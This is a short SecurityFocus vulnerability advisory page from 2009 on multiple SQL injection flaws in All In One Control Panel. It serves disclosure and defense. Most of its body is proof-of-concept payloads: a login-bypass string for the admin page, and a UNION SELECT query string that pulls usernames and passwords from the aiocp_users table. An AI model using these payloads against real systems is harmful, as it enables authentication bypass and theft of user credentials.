Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

All In One Control Panel Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept examples are available:

In: http://www.example.com/AIOCP/admin/code/index.php
Username: ' OR user_id = '2' UNION SELECT * FROM aiocp_users WHERE user_name='
Password: *any password*

http://www.example.com/AIOCP/public/code/cp_downloads.php?did=[sql]

http://www.example.org/AIOCP/public/code/cp_downloads.php?did='+UNION+SELECT+NULL,NULL,NULL,NULL,user_id,NULL,NULL,user_name,NULL,user_password,NULL,NULL,NULL,NULL,NULL+FROM+aiocp_users+WHERE+user_name<>'Anonymous







 

Privacy Statement
Copyright 2009, SecurityFocus